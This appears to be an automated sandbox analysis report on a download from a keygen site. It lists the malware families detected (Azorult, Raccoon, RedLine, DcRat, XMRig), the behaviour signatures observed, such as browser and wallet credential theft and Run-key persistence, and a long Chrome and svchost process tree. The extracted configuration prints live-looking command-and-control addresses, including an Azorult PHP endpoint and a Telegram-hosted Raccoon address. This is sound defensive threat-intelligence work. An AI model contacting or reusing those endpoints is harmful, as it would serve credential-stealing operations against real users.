Analysis

  • max time kernel
    592s
  • max time network
    596s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-04-2021 16:38

General

  • Target

    https://keygenit.com/d/8c73583673768946q1.html

  • Sample

    210419-ekqrpaxmhn

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1188
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1368
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8c73583673768946q1.html
        1⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff8916b4f50,0x7ff8916b4f60,0x7ff8916b4f70
          2⤵
            PID:640
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:2
            2⤵
              PID:2496
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:8
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3784
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:8
              2⤵
                PID:4052
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
                2⤵
                  PID:1340
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:1
                  2⤵
                    PID:1296
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                    2⤵
                      PID:3972
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                      2⤵
                        PID:2192
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
                        2⤵
                          PID:3768
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                          2⤵
                            PID:3604
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:8
                            2⤵
                              PID:4392
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4508
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:8
                              2⤵
                                PID:4732
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6252 /prefetch:8
                                2⤵
                                  PID:4760
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:8
                                  2⤵
                                    PID:4828
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6524 /prefetch:8
                                    2⤵
                                      PID:4864
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6400 /prefetch:8
                                      2⤵
                                        PID:4900
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6520 /prefetch:8
                                        2⤵
                                          PID:4936
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6416 /prefetch:8
                                          2⤵
                                            PID:4972
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6156 /prefetch:8
                                            2⤵
                                              PID:5008
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
                                              2⤵
                                                PID:5020
                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                2⤵
                                                  PID:5080
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff76fa4a890,0x7ff76fa4a8a0,0x7ff76fa4a8b0
                                                    3⤵
                                                      PID:5100
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6132 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4200
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6532 /prefetch:8
                                                    2⤵
                                                      PID:3940
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5264 /prefetch:8
                                                      2⤵
                                                        PID:4408
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3460 /prefetch:8
                                                        2⤵
                                                          PID:4440
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:8
                                                          2⤵
                                                            PID:4392
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
                                                            2⤵
                                                              PID:4560
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4980 /prefetch:8
                                                              2⤵
                                                                PID:4508
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4996 /prefetch:8
                                                                2⤵
                                                                  PID:3184
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8
                                                                  2⤵
                                                                    PID:4736
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:8
                                                                    2⤵
                                                                      PID:3896
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:8
                                                                      2⤵
                                                                        PID:4664
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5004 /prefetch:8
                                                                        2⤵
                                                                          PID:4888
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:8
                                                                          2⤵
                                                                            PID:4948
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7220 /prefetch:8
                                                                            2⤵
                                                                              PID:4920
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7208 /prefetch:8
                                                                              2⤵
                                                                                PID:4628
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7340 /prefetch:8
                                                                                2⤵
                                                                                  PID:4976
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7344 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5028
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7644 /prefetch:8
                                                                                    2⤵
                                                                                      PID:5052
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7772 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2668
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7888 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4264
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7900 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4844
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7912 /prefetch:8
                                                                                            2⤵
                                                                                              PID:348
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7924 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4740
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7936 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4644
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7948 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2676
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8320 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4744
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8664 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4852
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4916 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4684
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8632 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:1848
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8172 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:4528
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:4116
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5068
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7192 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4732
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6564 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4508
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:3788
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5388 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:1352
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,8147322642471149342,16792841158115126802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4544
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                  1⤵
                                                                                                                    PID:2656
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2640
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                    1⤵
                                                                                                                      PID:2556
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                      1⤵
                                                                                                                        PID:2336
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                        1⤵
                                                                                                                          PID:2328
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                          1⤵
                                                                                                                            PID:1788
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                            1⤵
                                                                                                                              PID:1244
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                              1⤵
                                                                                                                                PID:1080
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:684
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:68
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:500
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
